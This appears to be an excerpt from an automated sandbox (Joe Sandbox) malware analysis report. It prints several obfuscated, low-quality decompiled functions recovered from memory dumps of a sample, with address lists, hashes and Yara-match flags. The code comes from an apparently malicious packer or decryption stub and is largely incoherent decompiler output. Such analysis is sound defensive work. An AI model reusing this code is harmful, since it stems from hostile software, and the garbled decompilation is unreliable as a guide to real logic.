					 *(_t245 + 0x2a) =  *(_t245 + 0x2a) ^ _t155 +  *((intOrPtr*)(_t244 + 0x1a));
					asm("sbb al, 0x5f");
					_t98 = _t93 - 0xffffffffcea0c600 | 0x5f;
					_push(ss);
					asm("popad");
					asm("aaa");
					_t150 = _t98;
					_pop(_t235);
					_t93 = _t98 ^ 0x670ca01f;
					asm("salc");
					asm("sbb dh, [edi+0xca00f09]");
				} while (_t93 > 0);
				_t179 = _t178 -  *((intOrPtr*)(_t235 + 0xd9b0ad2));
				asm("wait");
				 *_t179 =  *_t179 << _t173;
				asm("sbb [ebx+0x5f], bl");
				asm("salc");
				asm("sbb [edi-0x68], dl");
				asm("sbb [ebx+0x1f], dl");
				asm("sbb [edi+0x5f], cl");
				asm("sbb [ebx+0x5f], cl");
				 *0xbb0ad256 =  *0xbb0ad256 | _t179;
				asm("ficomp dword [edi+0x5f99da50]");
				asm("ror byte [edx], cl");
				asm("iretd");
				asm("stosd");
				asm("ror byte [edx], cl");
				asm("stosd");
				asm("ficomp dword [edi+0x22dc262a]");
				asm("sbb ch, [ebx-0x29b4e02c]");
				asm("sbb ah, [edi+0x2264a06e]");
				asm("cmpsd");
				asm("ror byte [edx], cl");
				 *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) =  *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) |  *0x5f5fcfcc - 0x0000003c ^ 0x355f355f;
				asm("retf");
				asm("fcomp qword [edx]");
				asm("scasd");
				asm("ror byte [edx], cl");
				 *( *0x5f35af2a - 0x335f44d6) =  *( *0x5f35af2a - 0x335f44d6) |  *0x5f35af2a;
				asm("retf");
				asm("ficomp dword [edi+0x22dc482a]");
				asm("sbb ch, [edi+0xf4f1fd2]");
				asm("pushfd");
				asm("arpl [eax+0xca0bb2a], sp");
				asm("arpl sp, bx");
				asm("cdq");
				 *0x5f5f5f5f =  *0x1a9858b4;
				_a932187529 = _a932187529 & 0x0000007b;
			}






















































                    0x004021e7
                    0x004021e7
                    0x004021ea
                    0x004021ee
                    0x004021ef
                    0x004021f5
                    0x004021fa
                    0x004021fd
                    0x0040220d
                    0x00402212
                    0x0040221f
                    0x00402225
                    0x0040222b
                    0x0040222d
                    0x0040223e
                    0x0040223f
                    0x00402245
                    0x00402246
                    0x0040224e
                    0x00402250
                    0x00402253
                    0x00402259
                    0x0040225d
                    0x0040225e
                    0x00402267
                    0x0040226c
                    0x00402271
                    0x00402279
                    0x00402280
                    0x00402282
                    0x00402286
                    0x00402289
                    0x0040228e
                    0x00402295
                    0x00402299
                    0x0040229a
                    0x004022a5
                    0x004022a6
                    0x004022a9
                    0x004022aa
                    0x004022ad
                    0x004022ae
                    0x004022b1
                    0x004022b2
                    0x004022bb
                    0x004022bc
                    0x004022bf
                    0x004022c0
                    0x004022c3
                    0x004022ca
                    0x004022d1
                    0x004022d6
                    0x004022db
                    0x004022dc
                    0x004022e3
                    0x004022ea
                    0x004022ec
                    0x004022f0
                    0x004022f3
                    0x004022f4
                    0x004022f8
                    0x004022fa
                    0x004022ff
                    0x00402303
                    0x00402304
                    0x0040230f
                    0x00402310
                    0x00402313
                    0x00402314
                    0x00402317
                    0x00402318
                    0x0040231b
                    0x0040231c
                    0x00402325
                    0x00402329
                    0x0040232a
                    0x00402334
                    0x00402336
                    0x00402338
                    0x0040233f
                    0x00402347
                    0x00402348
                    0x0040234b
                    0x0040234c
                    0x00402351
                    0x00402352
                    0x00402352
                    0x0040235a
                    0x00402365
                    0x00402366
                    0x00402370
                    0x00402376
                    0x00402377
                    0x0040237a
                    0x00402381
                    0x00402388
                    0x0040238e
                    0x0040239b
                    0x004023a3
                    0x004023b2
                    0x004023ca
                    0x004023cb
                    0x004023d4
                    0x004023e0
                    0x004023eb
                    0x004023f1
                    0x004023f7
                    0x004023fa
                    0x00402404
                    0x0040240a
                    0x00402414
                    0x00402422
                    0x00402423
                    0x0040242f
                    0x00402435
                    0x00402439
                    0x00402444
                    0x0040244c
                    0x00402462
                    0x0040246e
                    0x00402470
                    0x0040247b
                    0x00402482

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2295373b1a9ec7701514fd28f41310fa92f3764e02d211d9c0ec9fc9e8afd442
                    • Instruction ID: 574b175cd4c3276966a44caaa50243e2d0c3fd8cacfb1010bc964ede041cf50b
                    • Opcode Fuzzy Hash: 2295373b1a9ec7701514fd28f41310fa92f3764e02d211d9c0ec9fc9e8afd442
                    • Instruction Fuzzy Hash: AF51732F35A6C2EAC7018A7EF9958DDFF20FDC663430856B7C28499C43C711A06BD6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0060224E Relevance: .2, Instructions: 235COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a31b03fc7a9bbcde54778cce94f8b08067c51e8834f9093aa2ee711ba3f86d3
                    • Instruction ID: 211cf0a3402be2b85703a1d739b6ce73781c66b293247b63146baa2529e2b0b2
                    • Opcode Fuzzy Hash: 1a31b03fc7a9bbcde54778cce94f8b08067c51e8834f9093aa2ee711ba3f86d3
                    • Instruction Fuzzy Hash: A351742F35A6C2EAC7058A7EF9998DDBF20FDC66303085677C28449D43C711A56BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402203 Relevance: .2, Instructions: 226COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 21%
                    			E00402203(signed char __edx, void* __edi, signed int __esi, void* __eflags, void* __fp0) {
				intOrPtr _t80;
				void* _t81;
				signed char _t88;
				signed int _t93;
				signed int _t98;
				signed char _t142;
				signed char _t143;
				signed char _t144;
				void* _t149;
				signed char _t153;
				signed char _t154;
				intOrPtr _t171;
				signed char _t172;
				signed char _t177;
				signed char _t178;
				void* _t181;
				void* _t191;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t202;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t222;
				void* _t225;
				void* _t227;
				void* _t232;
				void* _t234;
				void* _t235;
				void* _t236;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t241;
				void* _t243;
				void* _t244;
				signed int _t295;
				void* _t299;
				void* _t300;
				intOrPtr* _t303;
				intOrPtr* _t304;
				void* _t305;

				_t295 = __esi;
				_t181 = __edi;
				_t177 = __edx;
				asm("sbb ebx, ebp");
				_push(0x2224);
				_t80 =  *_t303;
				_t304 = _t303 + 4;
				_push(0x288);
				_t171 =  *_t304;
				_t305 = _t304 + 4;
				_t81 = E00401134(_t80, __edi, __eflags, __fp0);
				asm("sbb ah, [ebx+0x5f5f5f5e]");
				asm("aam 0x2");
				_push(_t181);
				asm("aaa");
				 *(_t81 - 0x15) =  *(_t81 - 0x15) ^ _t177;
				asm("daa");
				asm("aaa");
				asm("popad");
				_t172 = _t171 -  *((intOrPtr*)((_t295 ^  *0x46) + 9));
				_t88 =  *0x9fda470c;
				asm("fiadd dword [ebp+ebx*2+0x5f]");
				_t191 = _t88;
				asm("fcomp qword [ecx-0x484a4ba9]");
				_pop(_t192);
				asm("sbb bl, [edi+0x18]");
				_t195 = ss;
				_t197 = es;
				asm("sbb al, 0x5f");
				ss = ds;
				asm("adc [edi+0x1a], ebx");
				_t202 = ss;
				_pop(_t204);
				_pop(_t205);
				_pop(_t206);
				asm("sbb al, 0x5f");
				_pop(_t208);
				_t142 = (( *((intOrPtr*)(_t191 + 0x5f)) +  *((intOrPtr*)(_t192 + 0xd)) |  *(_t195 + 0xd)) +  *((intOrPtr*)(_t197 + 0x12)) +  *((intOrPtr*)(_t202 + 0xc)) -  *((intOrPtr*)(_t204 + 0x3a)) ^  *(_t205 + 3)) -  *((intOrPtr*)(_t206 + 0x2d)) -  *((intOrPtr*)(_t208 + 0x1c));
				_pop(_t209);
				 *(_t209 + 0x31) =  *(_t209 + 0x31) ^ _t142;
				_pop(_t210);
				_t143 = _t142 -  *((intOrPtr*)(_t210 + 0x2d));
				_pop(_t211);
				 *(_t211 + 0x33) =  *(_t211 + 0x33) ^ _t143;
				_pop(_t213);
				_t144 = _t143 +  *((intOrPtr*)(_t213 + 0x1a));
				_pop(_t214);
				 *(_t214 + 0x2a) =  *(_t214 + 0x2a) ^ _t144;
				_pop(_t215);
				asm("sbb ebx, [edi+0x1a]");
				_t222 = ss;
				asm("sbb bl, [edi+0x18]");
				_t225 = ss;
				_t93 = (_t88 | 0x0000005f) - 0xffffffffcea0c600 | 0x5f;
				_t227 = es;
				asm("sbb al, 0x5f");
				ss = ds;
				asm("adc [edi+0x1a], ebx");
				_t232 = ss;
				_t149 = ((_t144 ^  *(_t215 + 3)) +  *((intOrPtr*)(_t222 + 0xd)) |  *(_t225 + 0xd)) +  *((intOrPtr*)(_t227 + 0x12)) +  *((intOrPtr*)(_t232 + 0xc));
				_pop(_t234);
				do {
					_pop(_t235);
					_pop(_t236);
					asm("sbb al, 0x5f");
					_pop(_t238);
					_t153 = (_t149 -  *((intOrPtr*)(_t234 + 0x3a)) ^  *(_t235 + 3)) -  *((intOrPtr*)(_t236 + 0x2d)) -  *((intOrPtr*)(_t238 + 0x1c));
					_pop(_t239);
					 *(_t239 + 0x31) =  *(_t239 + 0x31) ^ _t153;
					_pop(_t240);
					_t154 = _t153 -  *((intOrPtr*)(_t240 + 0x2d));
					_pop(_t241);
					 *(_t241 + 0x33) =  *(_t241 + 0x33) ^ _t154;
					_pop(_t243);
					_pop(_t244);
					 *(_t244 + 0x2a) =  *(_t244 + 0x2a) ^ _t154 +  *((intOrPtr*)(_t243 + 0x1a));
					asm("sbb al, 0x5f");
					_t98 = _t93 - 0xffffffffcea0c600 | 0x5f;
					_push(ss);
					asm("popad");
					asm("aaa");
					_t149 = _t98;
					_pop(_t234);
					_t93 = _t98 ^ 0x670ca01f;
					asm("salc");
					asm("sbb dh, [edi+0xca00f09]");
				} while (_t93 > 0);
				_t178 = _t177 -  *((intOrPtr*)(_t234 + 0xd9b0ad2));
				asm("wait");
				 *_t178 =  *_t178 << _t172;
				asm("sbb [ebx+0x5f], bl");
				asm("salc");
				asm("sbb [edi-0x68], dl");
				asm("sbb [ebx+0x1f], dl");
				asm("sbb [edi+0x5f], cl");
				asm("sbb [ebx+0x5f], cl");
				 *0xbb0ad256 =  *0xbb0ad256 | _t178;
				asm("ficomp dword [edi+0x5f99da50]");
				asm("ror byte [edx], cl");
				_pop(_t299);
				asm("iretd");
				asm("stosd");
				asm("ror byte [edx], cl");
				asm("stosd");
				asm("ficomp dword [edi+0x22dc262a]");
				_t300 = _t299 -  *((intOrPtr*)(_t305 + (_t178 &  *0xFFFFFFFFFCDB506C) * 8));
				asm("sbb ch, [ebx-0x29b4e02c]");
				asm("sbb ah, [edi+0x2264a06e]");
				asm("cmpsd");
				asm("ror byte [edx], cl");
				 *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) =  *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) |  *0x5f5fcfcc - 0x0000003c ^ 0x355f355f;
				asm("retf");
				asm("fcomp qword [edx]");
				asm("scasd");
				asm("ror byte [edx], cl");
				 *( *0x5f35af2a - 0x335f44d6) =  *( *0x5f35af2a - 0x335f44d6) |  *0x5f35af2a;
				asm("retf");
				asm("ficomp dword [edi+0x22dc482a]");
				asm("sbb ch, [edi+0xf4f1fd2]");
				asm("pushfd");
				asm("arpl [eax+0xca0bb2a], sp");
				asm("arpl sp, bx");
				asm("cdq");
				 *0x5f5f5f5f =  *0x1a9858b4;
				 *(_t300 + 0x37900d8d) =  *(_t300 + 0x37900d8d) & 0x0000007b;
			}





















































                    0x00402203
                    0x00402203
                    0x00402203
                    0x00402203
                    0x004021f5
                    0x004021fa
                    0x004021fd
                    0x0040220d
                    0x00402212
                    0x00402215
                    0x0040221f
                    0x00402225
                    0x0040222b
                    0x0040222d
                    0x0040223e
                    0x0040223f
                    0x00402245
                    0x00402246
                    0x0040224e
                    0x00402250
                    0x00402253
                    0x00402259
                    0x0040225d
                    0x0040225e
                    0x00402267
                    0x0040226c
                    0x00402271
                    0x00402279
                    0x00402280
                    0x00402282
                    0x00402286
                    0x00402289
                    0x0040228e
                    0x00402295
                    0x00402299
                    0x0040229a
                    0x004022a5
                    0x004022a6
                    0x004022a9
                    0x004022aa
                    0x004022ad
                    0x004022ae
                    0x004022b1
                    0x004022b2
                    0x004022bb
                    0x004022bc
                    0x004022bf
                    0x004022c0
                    0x004022c3
                    0x004022ca
                    0x004022d1
                    0x004022d6
                    0x004022db
                    0x004022dc
                    0x004022e3
                    0x004022ea
                    0x004022ec
                    0x004022f0
                    0x004022f3
                    0x004022f4
                    0x004022f8
                    0x004022fa
                    0x004022ff
                    0x00402303
                    0x00402304
                    0x0040230f
                    0x00402310
                    0x00402313
                    0x00402314
                    0x00402317
                    0x00402318
                    0x0040231b
                    0x0040231c
                    0x00402325
                    0x00402329
                    0x0040232a
                    0x00402334
                    0x00402336
                    0x00402338
                    0x0040233f
                    0x00402347
                    0x00402348
                    0x0040234b
                    0x0040234c
                    0x00402351
                    0x00402352
                    0x00402352
                    0x0040235a
                    0x00402365
                    0x00402366
                    0x00402370
                    0x00402376
                    0x00402377
                    0x0040237a
                    0x00402381
                    0x00402388
                    0x0040238e
                    0x0040239b
                    0x004023a3
                    0x004023ac
                    0x004023b2
                    0x004023ca
                    0x004023cb
                    0x004023d4
                    0x004023e0
                    0x004023e8
                    0x004023eb
                    0x004023f1
                    0x004023f7
                    0x004023fa
                    0x00402404
                    0x0040240a
                    0x00402414
                    0x00402422
                    0x00402423
                    0x0040242f
                    0x00402435
                    0x00402439
                    0x00402444
                    0x0040244c
                    0x00402462
                    0x0040246e
                    0x00402470
                    0x0040247b
                    0x00402482

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d59f6f3162041bbcf6c9ee8dfae9598855c33c47c8c2a475590d109c414916c
                    • Instruction ID: eada4f50804c9ab052ce293b875910e2d91b3a8e4358feee3b03f6b57ddeb38e
                    • Opcode Fuzzy Hash: 1d59f6f3162041bbcf6c9ee8dfae9598855c33c47c8c2a475590d109c414916c
                    • Instruction Fuzzy Hash: 7051532F35A6C2EAC7018A7EF9958DDBF20FDC663530856B7C28499C43C711A06BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0060226A Relevance: .2, Instructions: 226COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d759a7e83d754e5d75c426be1be6dd45823257f2e3de362d6cd14e253a64b44
                    • Instruction ID: 4200c58afab6172b6b9ba7c74e368917ef170b3e62b14321b2695e222bff24c2
                    • Opcode Fuzzy Hash: 3d759a7e83d754e5d75c426be1be6dd45823257f2e3de362d6cd14e253a64b44
                    • Instruction Fuzzy Hash: 6451532F35A6C2EAC7458A7EF9958DDBF20FDC663530856B7C28489C43C711A06BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402209 Relevance: .2, Instructions: 223COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 22%
                    			E00402209(signed int __eax, signed char __edx, void* __edi, signed int __esi, void* __fp0) {
				void* _t82;
				signed char _t89;
				signed int _t94;
				signed int _t99;
				signed char _t143;
				signed char _t144;
				signed char _t145;
				void* _t150;
				signed char _t154;
				signed char _t155;
				intOrPtr _t172;
				signed char _t173;
				signed char _t178;
				signed char _t179;
				void* _t182;
				void* _t192;
				void* _t193;
				void* _t196;
				void* _t198;
				void* _t203;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t226;
				void* _t228;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t239;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t244;
				void* _t245;
				signed int _t296;
				void* _t300;
				void* _t301;
				intOrPtr* _t304;
				void* _t305;
				signed int _t307;

				_t296 = __esi;
				_t182 = __edi;
				_t178 = __edx;
				_t81 = __eax ^ 0x68c95800;
				_t307 = __eax ^ 0x68c95800;
				_push(0x288);
				_t172 =  *_t304;
				_t305 = _t304 + 4;
				_t82 = E00401134(_t81, __edi, _t307, __fp0);
				asm("sbb ah, [ebx+0x5f5f5f5e]");
				asm("aam 0x2");
				_push(_t182);
				asm("aaa");
				 *(_t82 - 0x15) =  *(_t82 - 0x15) ^ _t178;
				asm("daa");
				asm("aaa");
				asm("popad");
				_t173 = _t172 -  *((intOrPtr*)((_t296 ^  *0x46) + 9));
				_t89 =  *0x9fda470c;
				asm("fiadd dword [ebp+ebx*2+0x5f]");
				_t192 = _t89;
				asm("fcomp qword [ecx-0x484a4ba9]");
				_pop(_t193);
				asm("sbb bl, [edi+0x18]");
				_t196 = ss;
				_t198 = es;
				asm("sbb al, 0x5f");
				ss = ds;
				asm("adc [edi+0x1a], ebx");
				_t203 = ss;
				_pop(_t205);
				_pop(_t206);
				_pop(_t207);
				asm("sbb al, 0x5f");
				_pop(_t209);
				_t143 = (( *((intOrPtr*)(_t192 + 0x5f)) +  *((intOrPtr*)(_t193 + 0xd)) |  *(_t196 + 0xd)) +  *((intOrPtr*)(_t198 + 0x12)) +  *((intOrPtr*)(_t203 + 0xc)) -  *((intOrPtr*)(_t205 + 0x3a)) ^  *(_t206 + 3)) -  *((intOrPtr*)(_t207 + 0x2d)) -  *((intOrPtr*)(_t209 + 0x1c));
				_pop(_t210);
				 *(_t210 + 0x31) =  *(_t210 + 0x31) ^ _t143;
				_pop(_t211);
				_t144 = _t143 -  *((intOrPtr*)(_t211 + 0x2d));
				_pop(_t212);
				 *(_t212 + 0x33) =  *(_t212 + 0x33) ^ _t144;
				_pop(_t214);
				_t145 = _t144 +  *((intOrPtr*)(_t214 + 0x1a));
				_pop(_t215);
				 *(_t215 + 0x2a) =  *(_t215 + 0x2a) ^ _t145;
				_pop(_t216);
				asm("sbb ebx, [edi+0x1a]");
				_t223 = ss;
				asm("sbb bl, [edi+0x18]");
				_t226 = ss;
				_t94 = (_t89 | 0x0000005f) - 0xffffffffcea0c600 | 0x5f;
				_t228 = es;
				asm("sbb al, 0x5f");
				ss = ds;
				asm("adc [edi+0x1a], ebx");
				_t233 = ss;
				_t150 = ((_t145 ^  *(_t216 + 3)) +  *((intOrPtr*)(_t223 + 0xd)) |  *(_t226 + 0xd)) +  *((intOrPtr*)(_t228 + 0x12)) +  *((intOrPtr*)(_t233 + 0xc));
				_pop(_t235);
				do {
					_pop(_t236);
					_pop(_t237);
					asm("sbb al, 0x5f");
					_pop(_t239);
					_t154 = (_t150 -  *((intOrPtr*)(_t235 + 0x3a)) ^  *(_t236 + 3)) -  *((intOrPtr*)(_t237 + 0x2d)) -  *((intOrPtr*)(_t239 + 0x1c));
					_pop(_t240);
					 *(_t240 + 0x31) =  *(_t240 + 0x31) ^ _t154;
					_pop(_t241);
					_t155 = _t154 -  *((intOrPtr*)(_t241 + 0x2d));
					_pop(_t242);
					 *(_t242 + 0x33) =  *(_t242 + 0x33) ^ _t155;
					_pop(_t244);
					_pop(_t245);
					 *(_t245 + 0x2a) =  *(_t245 + 0x2a) ^ _t155 +  *((intOrPtr*)(_t244 + 0x1a));
					asm("sbb al, 0x5f");
					_t99 = _t94 - 0xffffffffcea0c600 | 0x5f;
					_push(ss);
					asm("popad");
					asm("aaa");
					_t150 = _t99;
					_pop(_t235);
					_t94 = _t99 ^ 0x670ca01f;
					asm("salc");
					asm("sbb dh, [edi+0xca00f09]");
				} while (_t94 > 0);
				_t179 = _t178 -  *((intOrPtr*)(_t235 + 0xd9b0ad2));
				asm("wait");
				 *_t179 =  *_t179 << _t173;
				asm("sbb [ebx+0x5f], bl");
				asm("salc");
				asm("sbb [edi-0x68], dl");
				asm("sbb [ebx+0x1f], dl");
				asm("sbb [edi+0x5f], cl");
				asm("sbb [ebx+0x5f], cl");
				 *0xbb0ad256 =  *0xbb0ad256 | _t179;
				asm("ficomp dword [edi+0x5f99da50]");
				asm("ror byte [edx], cl");
				_pop(_t300);
				asm("iretd");
				asm("stosd");
				asm("ror byte [edx], cl");
				asm("stosd");
				asm("ficomp dword [edi+0x22dc262a]");
				_t301 = _t300 -  *((intOrPtr*)(_t305 + (_t179 &  *0xFFFFFFFFFCDB506C) * 8));
				asm("sbb ch, [ebx-0x29b4e02c]");
				asm("sbb ah, [edi+0x2264a06e]");
				asm("cmpsd");
				asm("ror byte [edx], cl");
				 *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) =  *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) |  *0x5f5fcfcc - 0x0000003c ^ 0x355f355f;
				asm("retf");
				asm("fcomp qword [edx]");
				asm("scasd");
				asm("ror byte [edx], cl");
				 *( *0x5f35af2a - 0x335f44d6) =  *( *0x5f35af2a - 0x335f44d6) |  *0x5f35af2a;
				asm("retf");
				asm("ficomp dword [edi+0x22dc482a]");
				asm("sbb ch, [edi+0xf4f1fd2]");
				asm("pushfd");
				asm("arpl [eax+0xca0bb2a], sp");
				asm("arpl sp, bx");
				asm("cdq");
				 *0x5f5f5f5f =  *0x1a9858b4;
				 *(_t301 + 0x37900d8d) =  *(_t301 + 0x37900d8d) & 0x0000007b;
			}




















































                    0x00402209
                    0x00402209
                    0x00402209
                    0x00402209
                    0x00402209
                    0x0040220d
                    0x00402212
                    0x00402215
                    0x0040221f
                    0x00402225
                    0x0040222b
                    0x0040222d
                    0x0040223e
                    0x0040223f
                    0x00402245
                    0x00402246
                    0x0040224e
                    0x00402250
                    0x00402253
                    0x00402259
                    0x0040225d
                    0x0040225e
                    0x00402267
                    0x0040226c
                    0x00402271
                    0x00402279
                    0x00402280
                    0x00402282
                    0x00402286
                    0x00402289
                    0x0040228e
                    0x00402295
                    0x00402299
                    0x0040229a
                    0x004022a5
                    0x004022a6
                    0x004022a9
                    0x004022aa
                    0x004022ad
                    0x004022ae
                    0x004022b1
                    0x004022b2
                    0x004022bb
                    0x004022bc
                    0x004022bf
                    0x004022c0
                    0x004022c3
                    0x004022ca
                    0x004022d1
                    0x004022d6
                    0x004022db
                    0x004022dc
                    0x004022e3
                    0x004022ea
                    0x004022ec
                    0x004022f0
                    0x004022f3
                    0x004022f4
                    0x004022f8
                    0x004022fa
                    0x004022ff
                    0x00402303
                    0x00402304
                    0x0040230f
                    0x00402310
                    0x00402313
                    0x00402314
                    0x00402317
                    0x00402318
                    0x0040231b
                    0x0040231c
                    0x00402325
                    0x00402329
                    0x0040232a
                    0x00402334
                    0x00402336
                    0x00402338
                    0x0040233f
                    0x00402347
                    0x00402348
                    0x0040234b
                    0x0040234c
                    0x00402351
                    0x00402352
                    0x00402352
                    0x0040235a
                    0x00402365
                    0x00402366
                    0x00402370
                    0x00402376
                    0x00402377
                    0x0040237a
                    0x00402381
                    0x00402388
                    0x0040238e
                    0x0040239b
                    0x004023a3
                    0x004023ac
                    0x004023b2
                    0x004023ca
                    0x004023cb
                    0x004023d4
                    0x004023e0
                    0x004023e8
                    0x004023eb
                    0x004023f1
                    0x004023f7
                    0x004023fa
                    0x00402404
                    0x0040240a
                    0x00402414
                    0x00402422
                    0x00402423
                    0x0040242f
                    0x00402435
                    0x00402439
                    0x00402444
                    0x0040244c
                    0x00402462
                    0x0040246e
                    0x00402470
                    0x0040247b
                    0x00402482

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26460328608f7996706db2db09f01a22d471f1a8fd7a556d5edc8650d9f20fe6
                    • Instruction ID: 81100b3b585ab1a031ac1d8c25657d12bc4d4fa56ec599035ca8a75da73c802a
                    • Opcode Fuzzy Hash: 26460328608f7996706db2db09f01a22d471f1a8fd7a556d5edc8650d9f20fe6
                    • Instruction Fuzzy Hash: 1151432F35A7C2EAC7018A7EF9958DDBF20FDC663530856B7C28489D43C711A06BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00602270 Relevance: .2, Instructions: 223COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fc0769ee71a88b49e604354a2a996783d7664fabe88c69128c88b2d9de7d279d
                    • Instruction ID: 4ff0681706264dd7cdb44e392b6edd6d152f0c39cb4114cfb1de216dc6c82aa7
                    • Opcode Fuzzy Hash: fc0769ee71a88b49e604354a2a996783d7664fabe88c69128c88b2d9de7d279d
                    • Instruction Fuzzy Hash: 8A51432F35A6C2EAC7058A7EF9958DDBF20FDC663530856B7C28489D43C711A06BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040221B Relevance: .2, Instructions: 220COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 21%
                    			E0040221B(signed int __eax, signed char __edx, void* __edi, signed int __esi, void* __fp0) {
				void* _t83;
				signed char _t90;
				signed int _t95;
				signed int _t100;
				signed char _t144;
				signed char _t145;
				signed char _t146;
				void* _t151;
				signed char _t155;
				signed char _t156;
				intOrPtr _t173;
				signed char _t174;
				signed char _t179;
				signed char _t180;
				void* _t183;
				void* _t193;
				void* _t194;
				void* _t197;
				void* _t199;
				void* _t204;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t224;
				void* _t227;
				void* _t229;
				void* _t234;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				signed int _t297;
				void* _t301;
				void* _t302;
				intOrPtr* _t305;
				void* _t306;
				signed int _t308;

				_t297 = __esi;
				_t183 = __edi;
				_t179 = __edx;
				_t308 = __eax & 0x000000eb;
				_push(0x288);
				_t173 =  *_t305;
				_t306 = _t305 + 4;
				_t83 = E00401134(__eax, __edi, _t308, __fp0);
				asm("sbb ah, [ebx+0x5f5f5f5e]");
				asm("aam 0x2");
				_push(_t183);
				asm("aaa");
				 *(_t83 - 0x15) =  *(_t83 - 0x15) ^ _t179;
				asm("daa");
				asm("aaa");
				asm("popad");
				_t174 = _t173 -  *((intOrPtr*)((_t297 ^  *0x46) + 9));
				_t90 =  *0x9fda470c;
				asm("fiadd dword [ebp+ebx*2+0x5f]");
				_t193 = _t90;
				asm("fcomp qword [ecx-0x484a4ba9]");
				_pop(_t194);
				asm("sbb bl, [edi+0x18]");
				_t197 = ss;
				_t199 = es;
				asm("sbb al, 0x5f");
				ss = ds;
				asm("adc [edi+0x1a], ebx");
				_t204 = ss;
				_pop(_t206);
				_pop(_t207);
				_pop(_t208);
				asm("sbb al, 0x5f");
				_pop(_t210);
				_t144 = (( *((intOrPtr*)(_t193 + 0x5f)) +  *((intOrPtr*)(_t194 + 0xd)) |  *(_t197 + 0xd)) +  *((intOrPtr*)(_t199 + 0x12)) +  *((intOrPtr*)(_t204 + 0xc)) -  *((intOrPtr*)(_t206 + 0x3a)) ^  *(_t207 + 3)) -  *((intOrPtr*)(_t208 + 0x2d)) -  *((intOrPtr*)(_t210 + 0x1c));
				_pop(_t211);
				 *(_t211 + 0x31) =  *(_t211 + 0x31) ^ _t144;
				_pop(_t212);
				_t145 = _t144 -  *((intOrPtr*)(_t212 + 0x2d));
				_pop(_t213);
				 *(_t213 + 0x33) =  *(_t213 + 0x33) ^ _t145;
				_pop(_t215);
				_t146 = _t145 +  *((intOrPtr*)(_t215 + 0x1a));
				_pop(_t216);
				 *(_t216 + 0x2a) =  *(_t216 + 0x2a) ^ _t146;
				_pop(_t217);
				asm("sbb ebx, [edi+0x1a]");
				_t224 = ss;
				asm("sbb bl, [edi+0x18]");
				_t227 = ss;
				_t95 = (_t90 | 0x0000005f) - 0xffffffffcea0c600 | 0x5f;
				_t229 = es;
				asm("sbb al, 0x5f");
				ss = ds;
				asm("adc [edi+0x1a], ebx");
				_t234 = ss;
